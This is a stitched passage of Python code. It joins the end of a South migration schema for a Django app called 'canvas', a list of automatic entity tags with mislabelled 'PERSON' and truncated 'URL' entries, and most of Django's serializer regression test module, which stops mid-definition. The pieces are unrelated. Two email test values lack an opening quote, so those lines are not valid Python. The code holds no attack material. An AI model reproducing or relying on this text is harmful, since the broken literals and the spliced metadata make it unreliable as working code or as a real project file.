'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'canvas.followcategory': {
'Meta': {'unique_together': "(('user', 'category'),)", 'object_name': 'FollowCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'followers'", 'to': "orm['canvas.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'following'", 'to': "orm['auth.User']"})
},
'canvas.invitecode': {
'Meta': {'object_name': 'InviteCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"})
},
'canvas.remixplugin': {
'Meta': {'object_name': 'RemixPlugin'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.stashcontent': {
'Meta': {'object_name': 'StashContent'},
'content': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.userinfo': {
'Meta': {'object_name': 'UserInfo'},
'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']", 'null': 'True'}),
'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'follower_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invite_bypass': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']", 'null': 'True'}),
'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}),
'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'canvas.usermoderationlog': {
'Meta': {'object_name': 'UserModerationLog'},
'action': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderation_log'", 'to': "orm['auth.User']"})
},
'canvas.userwarning': {
'Meta': {'object_name': 'UserWarning'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'custom_message': ('django.db.models.fields.TextField', [], {}),
'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('canvas.util.UnixTimestampField', [], {}),
'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_warnings'", 'to': "orm['auth.User']"}),
'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.welcomeemailrecipient': {
'Meta': {'object_name': 'WelcomeEmailRecipient'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['canvas']
| 21,701 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'FloatField'], ['DATE_TIME', "'2000'"], ['PERSON', 'FloatField'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['PERSON', 'RemixPlugin'], ['DATE_TIME', "'2000'"], ['PERSON', 'follower_count'], ['PERSON', 'UserWarning'], ['PERSON', 'complete_apps'], ['URL', 'auth.gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'auth.pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'contenttypes.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'auth.us'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.be'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'canvas.ca'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.fo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.in'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.re'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'canvas.st'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Nu'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'contenttypes.co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch']] |
42 | """
A test spanning all the capabilities of all the serializers.
This class defines sample data and a dynamically generated
test case that is capable of testing the capabilities of
the serializers. This includes all valid data values, plus
forward, backwards and self references.
"""
from __future__ import unicode_literals
import datetime
import decimal
from unittest import expectedFailure, skipUnless
try:
import yaml
except ImportError:
yaml = None
from django.core import serializers
from django.core.serializers import SerializerDoesNotExist
from django.core.serializers.base import DeserializationError
from django.core.serializers.xml_serializer import DTDForbidden
from django.db import connection, models
from django.http import HttpResponse
from django.test import TestCase
from django.utils import six
from django.utils.encoding import force_text
from django.utils.functional import curry
from .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData,
FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData,
GenericIPAddressData, NullBooleanData, PositiveIntegerData,
PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData,
GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData,
FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData,
Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData,
DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData,
GenericIPAddressPKData, PositiveIntegerPKData,
PositiveSmallIntegerPKData, SlugPKData, SmallPKData,
AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel,
ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel,
ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel,
NaturalKeyAnchor, FKDataNaturalKey)
# A set of functions that can be used to recreate
# test data objects of various kinds.
# The save method is a raw base model save, to make
# sure that the data in the database matches the
# exact test case.
def data_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def generic_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data[0]
models.Model.save_base(instance, raw=True)
for tag in data[1:]:
instance.tags.create(data=tag)
return [instance]
def fk_create(pk, klass, data):
instance = klass(id=pk)
setattr(instance, 'data_id', data)
models.Model.save_base(instance, raw=True)
return [instance]
def m2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
instance.data = data
return [instance]
def im2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
return [instance]
def im_create(pk, klass, data):
instance = klass(id=pk)
instance.right_id = data['right']
instance.left_id = data['left']
if 'extra' in data:
instance.extra = data['extra']
models.Model.save_base(instance, raw=True)
return [instance]
def o2o_create(pk, klass, data):
instance = klass()
instance.data_id = data
models.Model.save_base(instance, raw=True)
return [instance]
def pk_create(pk, klass, data):
instance = klass()
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def inherited_create(pk, klass, data):
instance = klass(id=pk,**data)
# This isn't a raw save because:
# 1) we're testing inheritance, not field behavior, so none
# of the field values need to be protected.
# 2) saving the child class and having the parent created
# automatically is easier than manually creating both.
models.Model.save(instance)
created = [instance]
for klass,field in instance._meta.parents.items():
created.append(klass.objects.get(id=pk))
return created
# A set of functions that can be used to compare
# test data objects of various kinds
def data_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
if klass == BinaryData and data is not None:
testcase.assertEqual(bytes(data), bytes(instance.data),
"Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)" % (
pk, repr(bytes(data)), type(data), repr(bytes(instance.data)),
type(instance.data))
)
else:
testcase.assertEqual(data, instance.data,
"Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)" % (
pk, data, type(data), instance, type(instance.data))
)
def generic_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data[0], instance.data)
testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')])
def fk_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, instance.data_id)
def m2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')])
def im2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
#actually nothing else to check, the instance just should exist
def im_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data['left'], instance.left_id)
testcase.assertEqual(data['right'], instance.right_id)
if 'extra' in data:
testcase.assertEqual(data['extra'], instance.extra)
else:
testcase.assertEqual("doesn't matter", instance.extra)
def o2o_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data_id)
def pk_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data)
def inherited_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
for key,value in data.items():
testcase.assertEqual(value, getattr(instance,key))
# Define some data types. Each data type is
# actually a pair of functions; one to create
# and one to compare objects of that type
data_obj = (data_create, data_compare)
generic_obj = (generic_create, generic_compare)
fk_obj = (fk_create, fk_compare)
m2m_obj = (m2m_create, m2m_compare)
im2m_obj = (im2m_create, im2m_compare)
im_obj = (im_create, im_compare)
o2o_obj = (o2o_create, o2o_compare)
pk_obj = (pk_create, pk_compare)
inherited_obj = (inherited_create, inherited_compare)
test_data = [
# Format: (data type, PK value, Model Class, data)
(data_obj, 1, BinaryData, six.memoryview(b"\x05\xFD\x00")),
(data_obj, 2, BinaryData, None),
(data_obj, 5, BooleanData, True),
(data_obj, 6, BooleanData, False),
(data_obj, 10, CharData, "Test Char Data"),
(data_obj, 11, CharData, ""),
(data_obj, 12, CharData, "None"),
(data_obj, 13, CharData, "null"),
(data_obj, 14, CharData, "NULL"),
(data_obj, 15, CharData, None),
# (We use something that will fit into a latin1 database encoding here,
# because that is still the default used on many system setups.)
(data_obj, 16, CharData, '\xa5'),
(data_obj, 20, DateData, datetime.date(2006,6,16)),
(data_obj, 21, DateData, None),
(data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 31, DateTimeData, None),
(data_obj, 40, EmailData, dummy@email.com"),
(data_obj, 41, EmailData, None),
(data_obj, 42, EmailData, ""),
(data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'),
# (data_obj, 51, FileData, None),
(data_obj, 52, FileData, ""),
(data_obj, 60, FilePathData, "/foo/bar/whiz.txt"),
(data_obj, 61, FilePathData, None),
(data_obj, 62, FilePathData, ""),
(data_obj, 70, DecimalData, decimal.Decimal('12.345')),
(data_obj, 71, DecimalData, decimal.Decimal('-12.345')),
(data_obj, 72, DecimalData, decimal.Decimal('0.0')),
(data_obj, 73, DecimalData, None),
(data_obj, 74, FloatData, 12.345),
(data_obj, 75, FloatData, -12.345),
(data_obj, 76, FloatData, 0.0),
(data_obj, 77, FloatData, None),
(data_obj, 80, IntegerData, 123456789),
(data_obj, 81, IntegerData, -123456789),
(data_obj, 82, IntegerData, 0),
(data_obj, 83, IntegerData, None),
#(XX, ImageData
(data_obj, 90, IPAddressData, "127.0.0.1"),
(data_obj, 91, IPAddressData, None),
(data_obj, 95, GenericIPAddressData, "127.0.0.1"),
(data_obj, 96, GenericIPAddressData, None),
(data_obj, 100, NullBooleanData, True),
(data_obj, 101, NullBooleanData, False),
(data_obj, 102, NullBooleanData, None),
(data_obj, 120, PositiveIntegerData, 123456789),
(data_obj, 121, PositiveIntegerData, None),
(data_obj, 130, PositiveSmallIntegerData, 12),
(data_obj, 131, PositiveSmallIntegerData, None),
(data_obj, 140, SlugData, "this-is-a-slug"),
(data_obj, 141, SlugData, None),
(data_obj, 142, SlugData, ""),
(data_obj, 150, SmallData, 12),
(data_obj, 151, SmallData, -12),
(data_obj, 152, SmallData, 0),
(data_obj, 153, SmallData, None),
(data_obj, 160, TextData, """This is a long piece of text.
It contains line breaks.
Several of them.
The end."""),
(data_obj, 161, TextData, ""),
(data_obj, 162, TextData, None),
(data_obj, 170, TimeData, datetime.time(10,42,37)),
(data_obj, 171, TimeData, None),
(generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']),
(generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']),
(data_obj, 300, Anchor, "Anchor 1"),
(data_obj, 301, Anchor, "Anchor 2"),
(data_obj, 302, UniqueAnchor, "UAnchor 1"),
(fk_obj, 400, FKData, 300), # Post reference
(fk_obj, 401, FKData, 500), # Pre reference
(fk_obj, 402, FKData, None), # Empty reference
(m2m_obj, 410, M2MData, []), # Empty set
(m2m_obj, 411, M2MData, [300,301]), # Post reference
(m2m_obj, 412, M2MData, [500,501]), # Pre reference
(m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference
(o2o_obj, None, O2OData, 300), # Post reference
(o2o_obj, None, O2OData, 500), # Pre reference
(fk_obj, 430, FKSelfData, 431), # Pre reference
(fk_obj, 431, FKSelfData, 430), # Post reference
(fk_obj, 432, FKSelfData, None), # Empty reference
(m2m_obj, 440, M2MSelfData, []),
(m2m_obj, 441, M2MSelfData, []),
(m2m_obj, 442, M2MSelfData, [440, 441]),
(m2m_obj, 443, M2MSelfData, [445, 446]),
(m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]),
(m2m_obj, 445, M2MSelfData, []),
(m2m_obj, 446, M2MSelfData, []),
(fk_obj, 450, FKDataToField, "UAnchor 1"),
(fk_obj, 451, FKDataToField, "UAnchor 2"),
(fk_obj, 452, FKDataToField, None),
(fk_obj, 460, FKDataToO2O, 300),
(im2m_obj, 470, M2MIntermediateData, None),
#testing post- and prereferences and extra fields
(im_obj, 480, Intermediate, {'right': 300, 'left': 470}),
(im_obj, 481, Intermediate, {'right': 300, 'left': 490}),
(im_obj, 482, Intermediate, {'right': 500, 'left': 470}),
(im_obj, 483, Intermediate, {'right': 500, 'left': 490}),
(im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': "extra"}),
(im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': "extra"}),
(im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': "extra"}),
(im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': "extra"}),
(im2m_obj, 490, M2MIntermediateData, []),
(data_obj, 500, Anchor, "Anchor 3"),
(data_obj, 501, Anchor, "Anchor 4"),
(data_obj, 502, UniqueAnchor, "UAnchor 2"),
(pk_obj, 601, BooleanPKData, True),
(pk_obj, 602, BooleanPKData, False),
(pk_obj, 610, CharPKData, "Test Char PKData"),
# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)),
# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)),
(pk_obj, 640, EmailPKData, dummy@email.com"),
# (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'),
(pk_obj, 660, FilePathPKData, "/foo/bar/whiz.txt"),
(pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')),
(pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')),
(pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')),
(pk_obj, 673, FloatPKData, 12.345),
(pk_obj, 674, FloatPKData, -12.345),
(pk_obj, 675, FloatPKData, 0.0),
(pk_obj, 680, IntegerPKData, 123456789),
(pk_obj, 681, IntegerPKData, -123456789),
(pk_obj, 682, IntegerPKData, 0),
# (XX, ImagePKData
(pk_obj, 690, IPAddressPKData, "127.0.0.1"),
(pk_obj, 695, GenericIPAddressPKData, "127.0.0.1"),
# (pk_obj, 700, NullBooleanPKData, True),
# (pk_obj, 701, NullBooleanPKData, False),
(pk_obj, 720, PositiveIntegerPKData, 123456789),
(pk_obj, 730, PositiveSmallIntegerPKData, 12),
(pk_obj, 740, SlugPKData, "this-is-a-slug"),
(pk_obj, 750, SmallPKData, 12),
(pk_obj, 751, SmallPKData, -12),
(pk_obj, 752, SmallPKData, 0),
# (pk_obj, 760, TextPKData, """This is a long piece of text.
# It contains line breaks.
# Several of them.
# The end."""),
# (pk_obj, 770, TimePKData, datetime.time(10,42,37)),
# (pk_obj, 790, XMLPKData, "<foo></foo>"),
(data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 810, ModifyingSaveData, 42),
(inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}),
(data_obj, 1000, BigIntegerData, 9223372036854775807),
(data_obj, 1001, BigIntegerData, -9223372036854775808),
(data_obj, 1002, BigIntegerData, 0),
(data_obj, 1003, BigIntegerData, None),
(data_obj, 1004, LengthModel, 0),
(data_obj, 1005, LengthModel, 1),
]
natural_key_test_data = [
(data_obj, 1100, NaturalKeyAnchor, "Natural Key Anghor"),
(fk_obj, 1101, FKDataNaturalKey, 1100),
(fk_obj, 1102, FKDataNaturalKey, None),
]
# Because Oracle treats the empty string as NULL, Oracle is expected to fail
# when field.empty_strings_allowed is True and the value is None; skip these
# tests.
if connection.features.interprets_empty_strings_as_nulls:
test_data = [data for data in test_data
if not (data[0] == data_obj and
data[2]._meta.get_field('data').empty_strings_allowed and
data[3] is None)]
# Regression test for #8651 -- a FK to an object iwth PK of 0
# This won't work on MySQL since it won't let you create an object
# with a primary key of 0,
if connection.features.allows_primary_key_0:
test_data.extend([
(data_obj, 0, Anchor, "Anchor 0"),
(fk_obj, 465, FKData, 0),
])
# Dynamically create serializer tests to ensure that all
# registered serializers are automatically tested.
class SerializerTests(TestCase):
def test_get_unknown_serializer(self):
"""
#15889: get_serializer('nonsense') raises a SerializerDoesNotExist
"""
with self.assertRaises(SerializerDoesNotExist):
serializers.get_serializer("nonsense")
with self.assertRaises(KeyError):
serializers.get_serializer("nonsense")
# SerializerDoesNotExist is instantiated with the nonexistent format
with self.assertRaises(SerializerDoesNotExist) as cm:
serializers.get_serializer("nonsense")
self.assertEqual(cm.exception.args, ("nonsense",))
def test_unregister_unkown_serializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.unregister_serializer("nonsense")
def test_get_unkown_deserializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.get_deserializer("nonsense")
def test_json_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize("json", """[{"pk":1}"""):
pass
@skipUnless(yaml, "PyYAML not installed")
def test_yaml_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize("yaml", "{"):
pass
def test_serialize_proxy_model(self):
BaseModel.objects.create(parent_data=1)
base_objects = BaseModel.objects.all()
proxy_objects = ProxyBaseModel.objects.all()
proxy_proxy_objects = ProxyProxyBaseModel.objects.all()
base_data = serializers.serialize("json", base_objects)
proxy_data = serializers.serialize("json", proxy_objects)
proxy_proxy_data = serializers.serialize("json", proxy_proxy_objects)
self.assertEqual(base_data, proxy_data.replace('proxy', ''))
self.assertEqual(base_data, proxy_proxy_data.replace('proxy', ''))
def serializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
# Get a count of the number of objects created for each class
for klass in instance_count:
instance_count[klass] = klass.objects.count()
# Add the generic tagged objects to the object list
objects.extend(Tag.objects.all())
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
if connection.vendor == 'mysql' and six.PY3:
# Existing MySQL DB-API drivers fail on binary data.
serializerTest = expectedFailure(serializerTest)
def naturalKeySerializerTest(format, self):
